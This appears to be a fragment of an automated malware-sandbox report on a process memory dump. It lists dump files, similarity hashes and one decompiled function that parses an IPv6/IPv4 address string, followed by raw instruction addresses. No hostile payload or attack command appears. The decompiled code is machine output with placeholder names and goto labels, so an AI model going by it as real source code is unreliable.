                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                                • API String ID: 0-3177188983
                                                                                                                                                                • Opcode ID: 8acb6b6dae23c7719ae0ef0287f9e11b287332b7f04fb9ae7001fbeb1e90b589
                                                                                                                                                                • Instruction ID: 13b4873c995200126cbae510d1d97a6662d5646390297819efdf42a0dd37a4eb
                                                                                                                                                                • Opcode Fuzzy Hash: 8acb6b6dae23c7719ae0ef0287f9e11b287332b7f04fb9ae7001fbeb1e90b589
                                                                                                                                                                • Instruction Fuzzy Hash: E641B0B0A00315AFC720DB68CC88FAF77E9AF44320F208619FE559B2D1D775E9419B61
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0202FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E0202FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0202EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0202EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0202685D(_t167, 4) == 0) {
								if(E0202685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0202685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0202685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02008980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01FFDFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0202EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0202EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                                                                                                                                0x0202fcd1
                                                                                                                                                                0x0202fcd6
                                                                                                                                                                0x0202fcd9
                                                                                                                                                                0x0202fcdc
                                                                                                                                                                0x0202fcdf
                                                                                                                                                                0x0202fce2
                                                                                                                                                                0x0202fce5
                                                                                                                                                                0x0202fce8
                                                                                                                                                                0x0202fceb
                                                                                                                                                                0x0202fced
                                                                                                                                                                0x0202fced
                                                                                                                                                                0x0202fcf3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fcfc
                                                                                                                                                                0x0202fcfe
                                                                                                                                                                0x0202fdc1
                                                                                                                                                                0x0205ecbd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eccc
                                                                                                                                                                0x0205eccc
                                                                                                                                                                0x0205ecd2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ecdf
                                                                                                                                                                0x0205ece0
                                                                                                                                                                0x0205ece4
                                                                                                                                                                0x0205eceb
                                                                                                                                                                0x0205ecee
                                                                                                                                                                0x0205eca8
                                                                                                                                                                0x0205eca8
                                                                                                                                                                0x0205ecaa
                                                                                                                                                                0x0202fd76
                                                                                                                                                                0x0202fd79
                                                                                                                                                                0x0202fdb4
                                                                                                                                                                0x0202fdb5
                                                                                                                                                                0x0202fdb6
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fdb6
                                                                                                                                                                0x0202fd7e
                                                                                                                                                                0x0205ecfc
                                                                                                                                                                0x0202fe2f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fe2f
                                                                                                                                                                0x0205ed08
                                                                                                                                                                0x0205ed0f
                                                                                                                                                                0x0205ed17
                                                                                                                                                                0x0205ed1b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed1b
                                                                                                                                                                0x0202fd88
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd94
                                                                                                                                                                0x0202fd99
                                                                                                                                                                0x0202fda1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fdb0
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fdb0
                                                                                                                                                                0x0205ecbd
                                                                                                                                                                0x0202fdc7
                                                                                                                                                                0x0202fdcb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fdd7
                                                                                                                                                                0x0202fde3
                                                                                                                                                                0x0202fe06
                                                                                                                                                                0x02041fe7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02041fef
                                                                                                                                                                0x02041ff0
                                                                                                                                                                0x02041ff4
                                                                                                                                                                0x02041ff7
                                                                                                                                                                0x02041ffa
                                                                                                                                                                0x02041ffd
                                                                                                                                                                0x02042000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ecf1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fe06
                                                                                                                                                                0x0202fde8
                                                                                                                                                                0x0202fdec
                                                                                                                                                                0x0202fdef
                                                                                                                                                                0x0202fdf2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fdf2
                                                                                                                                                                0x0202fdcb
                                                                                                                                                                0x0202fd04
                                                                                                                                                                0x0202fd05
                                                                                                                                                                0x0205ec67
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ec6f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ec6f
                                                                                                                                                                0x0202fd13
                                                                                                                                                                0x0202fd3c
                                                                                                                                                                0x0202fd40
                                                                                                                                                                0x0205ec75
                                                                                                                                                                0x0205ec7a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ec8a
                                                                                                                                                                0x0205ec8a
                                                                                                                                                                0x0205ec90
                                                                                                                                                                0x0205ecb2
                                                                                                                                                                0x0202fd73
                                                                                                                                                                0x0202fd73
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd73
                                                                                                                                                                0x0205ec95
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eca1
                                                                                                                                                                0x0205eca4
                                                                                                                                                                0x0205eca5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205eca5
                                                                                                                                                                0x0205ec7a
                                                                                                                                                                0x0202fd4a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd6e
                                                                                                                                                                0x0202fd6e
                                                                                                                                                                0x0202fd71
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd71
                                                                                                                                                                0x0202fd4a
                                                                                                                                                                0x0202fd21
                                                                                                                                                                0x0203a3a1
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203a3a1
                                                                                                                                                                0x0202fd36
                                                                                                                                                                0x0204200b
                                                                                                                                                                0x02042012
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02042018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x02042018
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0202fd36
                                                                                                                                                                0x0202fe0f
                                                                                                                                                                0x0202fe16
                                                                                                                                                                0x0203a3ad
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0203a3b3
                                                                                                                                                                0x0203a3b3
                                                                                                                                                                0x0202fe1f
                                                                                                                                                                0x0205ed25
                                                                                                                                                                0x0205ed86
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed91
                                                                                                                                                                0x0205ed95
                                                                                                                                                                0x0205ed95
                                                                                                                                                                0x0205ed9a
                                                                                                                                                                0x0205edad
                                                                                                                                                                0x0205edb3
                                                                                                                                                                0x0205edba
                                                                                                                                                                0x0205edc4
                                                                                                                                                                0x0205edc9
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205edcc
                                                                                                                                                                0x0205ed2a
                                                                                                                                                                0x0205ed55
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed61
                                                                                                                                                                0x0205ed66
                                                                                                                                                                0x0205ed6e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed7d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed7d
                                                                                                                                                                0x0205ed30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x0205ed3c
                                                                                                                                                                0x0205ed43
                                                                                                                                                                0x0205ed4b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2371265151.0000000001FE0000.00000040.00000001.sdmp, Offset: 01FD0000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.2371260420.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371338809.00000000020C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371344209.00000000020D0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371349487.00000000020D4000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371354968.00000000020D7000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371360264.00000000020E0000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000009.00000002.2371398748.0000000002140000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fassign
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3965848254-0
                                                                                                                                                                • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction ID: b0c7772537fca2ef34c89f5c3128e6e89e1d359bf612113e64e33e2a10c3b628
                                                                                                                                                                • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                                • Instruction Fuzzy Hash: 30919031D0032AEADF26CF58C8487EEBBF5EF45348F20806BD845A6591E7705B49EB91
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%